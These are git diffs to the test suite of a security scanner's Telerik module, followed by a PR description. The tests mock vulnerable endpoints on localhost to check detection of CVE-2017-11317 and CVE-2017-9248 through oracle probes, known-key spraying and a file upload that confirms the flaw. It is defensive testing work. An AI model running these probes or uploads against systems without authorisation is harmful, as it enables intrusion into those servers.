+        )
+        # KDF-mode probe (POST dialogParametersHolder=AAAA) returns pre-patch PBKDF1_MS error
+        module_test.set_expect_requests(
+            expect_args={"method": "POST", "uri": "/App_Master/Telerik.Web.UI.DialogHandler.aspx"},
+            respond_args={"response_data": "Server Error: Length cannot be less than zero. Parameter name: length."},
+        )
+        # SpellCheck/ChartImage: not present
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.SpellCheckHandler.axd"},
+            respond_args={"status": 404},
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/ChartImage.axd"},
+            respond_args={"status": 404},
+        )
+
+    async def setup_after_prep(self, module_test):
+        module_test.scan.modules["telerik"].dialoghandler_urls = [
+            "App_Master/Telerik.Web.UI.DialogHandler.aspx",
+        ]
+
+    def check(self, module_test, events):
+        oracle_found = any(
+            e.type == "FINDING" and e.data.get("name") == "Telerik DialogHandler Oracle (CVE-2017-9248)"
+            for e in events
+        )
+        assert oracle_found, "Expected Telerik DialogHandler Oracle finding (CVE-2017-9248)"
+
+
+class TestTelerikDialogHandlerKnownKey(ModuleTestBase):
+    """PBKDF1_MS mode: hash key + enc key each solvable via distinct oracle strings → CRITICAL finding."""
+
+    targets = ["http://127.0.0.1:8888"]
+    module_name = "telerik"
+    modules_overrides = ["http", "telerik"]
+    config_overrides = {
+        "modules": {
+            "telerik": {
+                "probe_dialoghandler_oracle": False,
+                "try_known_keys": True,
+                "exploit_rau": False,
+            }
+        }
+    }
+
+    async def setup_before_prep(self, module_test):
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"},
+            respond_args={"status": 404},
+        )
+        module_test.set_expect_requests(
+            expect_args={
+                "method": "GET",
+                "uri": "/App_Master/Telerik.Web.UI.DialogHandler.aspx",
+                "query_string": "dp=1",
+            },
+            respond_args={
+                "response_data": "<div>Cannot deserialize dialog parameters. Please refresh the editor page.</div>",
+            },
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.SpellCheckHandler.axd"},
+            respond_args={"status": 404},
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/ChartImage.axd"},
+            respond_args={"status": 404},
+        )
+
+        # Rig a keyed responder: KDF probe returns PBKDF1_MS banner, hash-key probes 500 until we
+        # see the matching one, enc-key probes 500 until we see the matching one.
+        module_test.httpserver.expect_request(
+            "/App_Master/Telerik.Web.UI.DialogHandler.aspx", method="POST"
+        ).respond_with_handler(_dh_knownkey_handler)
+
+    async def setup_after_prep(self, module_test):
+        module_test.scan.modules["telerik"].dialoghandler_urls = [
+            "App_Master/Telerik.Web.UI.DialogHandler.aspx",
+        ]
+
+    def check(self, module_test, events):
+        known_key = any(
+            e.type == "FINDING" and e.data.get("name") == "Telerik DialogHandler Known Key (CVE-2017-9248)"
+            for e in events
+        )
+        assert known_key, "Expected Telerik DialogHandler Known Key finding (CVE-2017-9248)"
+
+
+def _dh_knownkey_handler(request):
+    """
+    Model a PBKDF1_MS target with the first badsecrets hash key and encryption key.
+    Distinguishes probe types by body length and by whether the payload passes
+    the HMAC-SHA256 test carried by badsecrets' hashkey_probe_generator.
+    """
+    from werkzeug.wrappers import Response
+    import hmac
+    import hashlib
+    import base64
+    from urllib.parse import parse_qs
+    from badsecrets import modules_loaded
+
+    body = request.get_data().decode(errors="replace")
+    params = parse_qs(body)
+    probe = params.get("dialogParametersHolder", [""])[0]
+
+    # KDF-mode probe: bare "AAAA" → PBKDF1_MS banner
+    if probe == "AAAA":
+        return Response(
+            "Server Error: Length cannot be less than zero. Parameter name: length.",
+            status=200,
+        )
+
+    hash_cls = modules_loaded["telerik_hashkey"]
+    enc_cls = modules_loaded["telerik_encryptionkey"]
+    hash_helper = hash_cls()
+    enc_helper = enc_cls()
+
+    hash_keys = list(hash_helper.prepare_keylist(include_machinekeys=False))
+    enc_keys = list(enc_helper.prepare_keylist(include_machinekeys=False))
+    target_hash_key = hash_keys[0]
+    target_enc_key = enc_keys[0]
+
+    # HMAC-verify the probe against target_hash_key. If it verifies AND the ciphertext prefix
+    # is exactly base64(known 20-byte test string) that's the hashkey_probe_generator; otherwise
+    # it's the encryptionkey probe (ciphertext = telerik_encrypt(b64("AAAAAAAAAAAAAAAAAAAA"))).
+    if len(probe) < 44:
+        return Response("", status=500)
+    dp_enc = probe[:-44].encode()
+    dp_hash = probe[-44:].encode()
+    try:
+        h = hmac.new(target_hash_key.encode(), dp_enc, hashlib.sha256)
+        if base64.b64encode(h.digest()) != dp_hash:
+            return Response("", status=500)
+    except Exception:
+        return Response("", status=500)
+
+    # Hashkey verified. Is this the hashkey probe (unencrypted long dialog-params b64)?
+    hashkey_test = b"EnableAsyncUpload,False,3,True;"
+    try:
+        decoded = base64.b64decode(dp_enc)
+    except Exception:
+        decoded = b""
+    if decoded.startswith(hashkey_test):
+        return Response(
+            "The input data is not a complete block.",
+            status=200,
+        )
+
+    # Otherwise this is the enckey probe. Verify enc_key by decrypting.
+    try:
+        ct_bytes = base64.b64decode(dp_enc)
+    except Exception:
+        return Response("", status=500)
+    derived_key, derived_iv = enc_helper.telerik_derivekeys_PBKDF1_MS(target_enc_key)
+    plaintext = enc_helper.telerik_decrypt(derived_key, derived_iv, ct_bytes)
+    if plaintext is not None:
+        return Response("Index was outside the bounds of the array.", status=200)
+    return Response("", status=500)
 
 
 class TestTelerikDialogHandler_includesubdirs(TestTelerik):
@@ -164,8 +349,8 @@ class TestTelerikDialogHandler_includesubdirs(TestTelerik):
         module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)
 
     async def setup_after_prep(self, module_test):
-        module_test.scan.modules["telerik"].telerikVersions = ["2014.2.724", "2014.3.1024", "2015.1.204"]
-        module_test.scan.modules["telerik"].DialogHandlerUrls = [
+        module_test.scan.modules["telerik"].telerik_versions = ["2014.2.724", "2014.3.1024", "2015.1.204"]
+        module_test.scan.modules["telerik"].dialoghandler_urls = [
             "App_Master/Telerik.Web.UI.DialogHandler.aspx",
         ]
 

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -328,11 +328,18 @@ class TestTelerikDialogHandlerKnownKey(ModuleTestBase):
         ]
 
     def check(self, module_test, events):
-        known_key = any(
-            e.type == "FINDING" and e.data.get("name") == "Telerik DialogHandler Known Key (CVE-2017-9248)"
+        matches = [
+            e
             for e in events
-        )
-        assert known_key, "Expected Telerik DialogHandler Known Key finding (CVE-2017-9248)"
+            if e.type == "FINDING" and e.data.get("name") == "Telerik DialogHandler Known Key (CVE-2017-9248)"
+        ]
+        assert matches, "Expected Telerik DialogHandler Known Key finding (CVE-2017-9248)"
+        # Mock returns a distinct-size body for Version=2014.3.1024, so version detection
+        # should succeed and the finding should be CRITICAL/CONFIRMED with the version noted.
+        assert any(
+            e.data.get("severity") == "CRITICAL" and "Version: [2014.3.1024]" in e.data.get("description", "")
+            for e in matches
+        ), "Expected CRITICAL finding with confirmed Version=2014.3.1024"
 
 
 def _dh_knownkey_handler(request):
@@ -395,16 +402,29 @@ def _dh_knownkey_handler(request):
             status=200,
         )
 
-    # Otherwise this is the enckey probe. Verify enc_key by decrypting.
+    # Otherwise this is the enckey probe OR a version-detection probe. Both are HMAC-signed
+    # with target_hash_key and encrypted with target_enc_key. Decrypt to distinguish.
     try:
         ct_bytes = base64.b64decode(dp_enc)
     except Exception:
         return Response("", status=500)
     derived_key, derived_iv = enc_helper.telerik_derivekeys_PBKDF1_MS(target_enc_key)
     plaintext = enc_helper.telerik_decrypt(derived_key, derived_iv, ct_bytes)
-    if plaintext is not None:
-        return Response("Index was outside the bounds of the array.", status=200)
-    return Response("", status=500)
+    if plaintext is None:
+        return Response("", status=500)
+    # Version-detection probes carry a DialogTypeName section (base64-encoded assembly type
+    # string). The enckey probe carries a short base64 blob. When the DialogTypeName decodes
+    # to our "installed" version, return a noticeably longer body so the size-delta test
+    # trips; other versions return baseline.
+    if "DialogTypeName" in plaintext:
+        installed_b64 = base64.b64encode(
+            b"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, "
+            b"Version=2014.3.1024, Culture=neutral, PublicKeyToken=121fae78165ba3d4"
+        ).decode()
+        if installed_b64 in plaintext:
+            return Response("<html><body>" + "A" * 500 + "</body></html>", status=200)
+        return Response("<html><body>baseline</body></html>", status=200)
+    return Response("Index was outside the bounds of the array.", status=200)
 
 
 class TestTelerikDialogHandler_includesubdirs(TestTelerik):

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -2,12 +2,40 @@ import re
 from .base import ModuleTestBase
 
 
+_rau_call_count = [0]
+
+
+def _rau_two_stage_handler(request):
+    """
+    Mock a vulnerable RAU endpoint. The safe fake-version probe (POST #1) gets 'Could not
+    load file or assembly'; subsequent POSTs (version iteration) get the fileInfo upload
+    blob. The version string is encrypted so we distinguish stages by call ordering.
+    """
+    from werkzeug.wrappers import Response
+
+    _rau_call_count[0] += 1
+    if _rau_call_count[0] == 1:
+        return Response(
+            "Exception Details: System.IO.FileLoadException: Could not load file or assembly "
+            "'Telerik.Web.UI, Version=9999.9.999, Culture=neutral, PublicKeyToken=121fae78165ba3d4'",
+            status=200,
+        )
+    return Response(
+        '{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,'
+        '"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"stub"}',
+        status=200,
+    )
+
+
 class TestTelerik(ModuleTestBase):
     targets = ["http://127.0.0.1:8888", "http://127.0.0.1:8888/telerik.aspx"]
     modules_overrides = ["http", "telerik"]
     config_overrides = {"modules": {"telerik": {"rau_confirm_version": True}}}
 
     async def setup_before_prep(self, module_test):
+        # Reset the RAU handler call counter for test isolation.
+        _rau_call_count[0] = 0
+
         # Simulate Telerik.Web.UI.WebResource.axd?type=rau detection
         expect_args = {"method": "GET", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"}
         respond_args = {
@@ -15,16 +43,13 @@ class TestTelerik(ModuleTestBase):
         }
         module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)
 
-        # Simulate a vulnerable RAU endpoint: any POST returns the fileInfo blob.
-        expect_args = {
-            "method": "POST",
-            "uri": "/Telerik.Web.UI.WebResource.axd",
-            "query_string": "type=rau",
-        }
-        respond_args = {
-            "response_data": '{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"stub"}'
-        }
-        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)
+        # Vulnerable RAU endpoint: first POST is the safe fake-version probe (Could not load
+        # file or assembly response); every POST after that is the version-iteration path
+        # (fileInfo upload success). Distinguish by call order because the assembly version
+        # is inside the encrypted rauPostData blob.
+        module_test.httpserver.expect_request(
+            "/Telerik.Web.UI.WebResource.axd", method="POST", query_string="type=rau"
+        ).respond_with_handler(_rau_two_stage_handler)
 
         # Simulate SpellCheckHandler detection
         expect_args = {"method": "GET", "uri": "/Telerik.Web.UI.SpellCheckHandler.axd"}
@@ -77,6 +102,7 @@ class TestTelerik(ModuleTestBase):
 
     def check(self, module_test, events):
         telerik_axd_detection = False
+        telerik_axd_keys_accepted = False
         telerik_axd_vulnerable = False
         telerik_spellcheck_detection = False
         telerik_dialoghandler_detection = False
@@ -86,6 +112,10 @@ class TestTelerik(ModuleTestBase):
         for e in events:
             if e.type == "FINDING" and e.data.get("name") == "Telerik RAU Handler":
                 telerik_axd_detection = True
+                continue
+
+            if e.type == "FINDING" and e.data.get("name") == "Telerik RAU Default Keys Accepted (CVE-2017-11317)":
+                telerik_axd_keys_accepted = True
                 continue
 
             if e.type == "FINDING" and e.data.get("name") == "Telerik RAU RCE (CVE-2017-11317)":
@@ -108,6 +138,9 @@ class TestTelerik(ModuleTestBase):
                 continue
 
         assert telerik_axd_detection, "Telerik AXD detection failed"
+        assert not telerik_axd_keys_accepted, (
+            "HIGH RAU Keys Accepted should be suppressed when the CRITICAL RCE also fires"
+        )
         assert telerik_axd_vulnerable, "Telerik vulnerable AXD detection failed"
         assert telerik_spellcheck_detection, "Telerik spellcheck detection failed"
         assert telerik_dialoghandler_detection, "Telerik dialoghandler detection failed"

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -206,7 +206,7 @@ class TestTelerikRAUDefaultKeys(ModuleTestBase):
         )
         assert handler_detected, "Expected Telerik RAU Handler INFO finding"
         assert keys_accepted, "Expected Telerik RAU Default Keys Accepted HIGH finding"
-        assert not rce_confirmed, "Should NOT emit RCE finding without exploit_rau=True"
+        assert not rce_confirmed, "Should NOT emit RCE finding without rau_confirm_version=True"
 
 
 class TestTelerikDialogHandlerOracle(ModuleTestBase):
@@ -479,4 +479,4 @@ class TestTelerikDialogHandler_includesubdirs(TestTelerik):
         finding_count = sum(
             1 for e in events if e.type == "FINDING" and "Telerik DialogHandler detected" in e.data["description"]
         )
-        assert finding_count == 2, "Expected 2 FINDING events (root and /temp), got {finding_count}"
+        assert finding_count == 2, f"Expected 2 FINDING events (root and /temp), got {finding_count}"

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -137,21 +137,27 @@ class TestTelerikDialogHandlerOracle(ModuleTestBase):
             expect_args={"method": "GET", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"},
             respond_args={"status": 404},
         )
-        # DialogHandler discovery: matches on ?dp=1 with the deserialize-error banner
+        # DialogHandler discovery: default path hits with the deserialize-error banner
         module_test.set_expect_requests(
             expect_args={
                 "method": "GET",
-                "uri": "/App_Master/Telerik.Web.UI.DialogHandler.aspx",
+                "uri": "/Telerik.Web.UI.DialogHandler.aspx",
                 "query_string": "dp=1",
             },
             respond_args={
                 "response_data": "<div>Cannot deserialize dialog parameters. Please refresh the editor page.</div>",
             },
         )
-        # KDF-mode probe (POST dialogParametersHolder=AAAA) returns pre-patch PBKDF1_MS error
+        # KDF-mode probe (POST dialogParametersHolder=AAAA) returns pre-patch PBKDF1_MS banner
+        # so the oracle-probe gate lets us proceed past known-key skip (try_known_keys=False)
         module_test.set_expect_requests(
-            expect_args={"method": "POST", "uri": "/App_Master/Telerik.Web.UI.DialogHandler.aspx"},
+            expect_args={"method": "POST", "uri": "/Telerik.Web.UI.DialogHandler.aspx"},
             respond_args={"response_data": "Server Error: Length cannot be less than zero. Parameter name: length."},
+        )
+        # find_baseline probe: GET ?dp=<base64(4 test bytes)> should leak an oracle error string
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.DialogHandler.aspx"},
+            respond_args={"response_data": "Server Error: Index was outside the bounds of the array."},
         )
         # SpellCheck/ChartImage: not present
         module_test.set_expect_requests(
@@ -165,7 +171,7 @@ class TestTelerikDialogHandlerOracle(ModuleTestBase):
 
     async def setup_after_prep(self, module_test):
         module_test.scan.modules["telerik"].dialoghandler_urls = [
-            "App_Master/Telerik.Web.UI.DialogHandler.aspx",
+            "Telerik.Web.UI.DialogHandler.aspx",
         ]
 
     def check(self, module_test, events):

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -5,7 +5,7 @@ from .base import ModuleTestBase
 class TestTelerik(ModuleTestBase):
     targets = ["http://127.0.0.1:8888", "http://127.0.0.1:8888/telerik.aspx"]
     modules_overrides = ["http", "telerik"]
-    config_overrides = {"modules": {"telerik": {"exploit_rau": True}}}
+    config_overrides = {"modules": {"telerik": {"rau_confirm_version": True}}}
 
     async def setup_before_prep(self, module_test):
         # Simulate Telerik.Web.UI.WebResource.axd?type=rau detection
@@ -127,7 +127,7 @@ class TestTelerikRAUDefaultKeys(ModuleTestBase):
     config_overrides = {
         "modules": {
             "telerik": {
-                "exploit_rau": False,
+                "rau_confirm_version": False,
                 "try_known_keys": False,
                 "probe_dialoghandler_oracle": False,
             }
@@ -187,7 +187,7 @@ class TestTelerikDialogHandlerOracle(ModuleTestBase):
             "telerik": {
                 "probe_dialoghandler_oracle": True,
                 "try_known_keys": False,
-                "exploit_rau": False,
+                "rau_confirm_version": False,
             }
         }
     }
@@ -254,7 +254,7 @@ class TestTelerikDialogHandlerKnownKey(ModuleTestBase):
             "telerik": {
                 "probe_dialoghandler_oracle": False,
                 "try_known_keys": True,
-                "exploit_rau": False,
+                "rau_confirm_version": False,
             }
         }
     }


### PR DESCRIPTION
## Summary

Rewrite of the `telerik` module.

- Removed the `rau_crypto` shell-out; AES-CBC done natively.
- Safe RAU detection via fake `9999.9.999` assembly version, flags exploitable RAU without writing a file. Opt-in `rau_confirm_version` walks candidate versions and uploads a 1-byte file on match for CRITICAL.
- Incorporated `badsecrets` `telerik_knownkey` for known-key spray on DialogHandler (PBKDF1_MS + PBKDF2).
- Ported the byte-oracle detection from `dp_cryptomg` (`find_baseline`, 81-combo `?dp=...` probe) as a fallback when known-key spray misses.
- DH version identification via response-size delta; RAU-confirmed version threads through to DH findings when DH's own probe misses.
- `dotnet-audit` preset opts into `rau_confirm_version` + `include_subdirs`.